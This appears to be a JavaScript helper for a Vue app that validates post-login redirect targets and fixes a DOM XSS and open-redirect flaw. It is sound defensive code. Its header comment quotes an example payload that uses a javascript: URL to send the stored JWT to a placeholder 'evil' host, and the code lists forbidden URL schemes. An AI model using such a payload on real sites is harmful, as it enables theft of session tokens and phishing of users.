/**
 * safeRedirect — validate a post-login "?to=" redirect target.
 *
 * SECURITY (fix C9 — client-side DOM XSS / open redirect):
 * Several auth pages navigated to `route.query.to` with ZERO validation right
 * after writing the JWT to localStorage, e.g.
 *     location.href = String(route.query.to)
 * That let an attacker craft a link such as:
 *   ?to=javascript:fetch('//evil/?j='+localStorage.getItem('jwt'))
 *       → runs arbitrary JS in-origin and exfiltrates the freshly-issued JWT
 *         (a DOM XSS), and
 *   ?to=https://phish.example
 *       → an open redirect usable for post-login phishing.
 *
 * Defense: a strict ALLOWLIST. We only ever navigate to a same-origin, relative
 * path that begins with a single "/" and carries no scheme, no authority, and
 * no backslash / control-character tricks. Anything else fails closed (returns
 * null) so the caller can fall back to a known-safe default. A value that
 * survives this check can never be `javascript:` and can never leave the
 * origin, whether it is handed to `router.push()` or assigned to
 * `location.href`.
 *
 * This helper is security-critical: keep it small, pure, and conservative.
 * When in doubt it rejects — a wrongly-rejected internal path merely lands the
 * user on the safe default, whereas a wrongly-accepted value is a vulnerability.
 */

// Scheme / authority markers that must never appear anywhere in an internal
// path. Checked case-insensitively. `://` blocks absolute URLs even if some
// exotic input slipped a leading slash in front of them.
const FORBIDDEN_SUBSTRINGS = ['javascript:', 'data:', 'vbscript:', '://']

// Control characters (NUL … US, plus DEL) that could smuggle a scheme past the
// checks below or confuse the URL parser.
// eslint-disable-next-line no-control-regex
const CONTROL_CHARS = /[\u0000-\u001f\u007f]/

/**
 * Coerce a vue-router query value (string | string[] | null | undefined) to a
 * single trimmed string, or '' when there is nothing usable.
 * @param {unknown} to
 * @returns {string}
 */
function firstString(to) {
  const raw = Array.isArray(to) ? to[0] : to

  return typeof raw === 'string' ? raw.trim() : ''
}

/**
 * Return a validated same-origin relative path, or null when `to` is missing
 * or unsafe. The returned value is always safe to hand to `router.push()` or to
 * assign to `location.href`.
 *
 * @param {unknown} to  Raw route.query.to (string | string[] | null | undefined)
 * @returns {string | null}
 */
export function safeRedirectPath(to) {
  const path = firstString(to)
  if (!path)
    return null

  // Must be a relative path with exactly one leading slash. This blocks
  // protocol-relative URLs ("//evil.com") and absolute URLs ("https://…",
  // "javascript:…") because those either start with a second slash or with a
  // scheme letter rather than "/".
  if (!/^\/(?!\/)/.test(path))
    return null

  // No backslashes — browsers can normalise "/\evil.com" or "\\evil.com" into a
  // protocol-relative navigation that leaves the origin.
  if (path.includes('\\'))
    return null

  // No control characters that could smuggle a scheme past the checks below.
  if (CONTROL_CHARS.test(path))
    return null

  // No scheme or authority marker anywhere in the string, case-insensitively.
  const lower = path.toLowerCase()
  if (FORBIDDEN_SUBSTRINGS.some(marker => lower.includes(marker)))
    return null

  return path
}

/**
 * Navigate the Vue router to a validated "?to=" target, falling back to a safe
 * default when the target is missing or unsafe. Prefer this over `location.href`
 * for in-app (SPA) navigation.
 *
 * @param {import('vue-router').Router} router
 * @param {unknown} to
 * @param {string} [fallback='/']
 * @returns {Promise<unknown>}
 */
export function goSafely(router, to, fallback = '/') {
  return router.push(safeRedirectPath(to) || fallback)
}
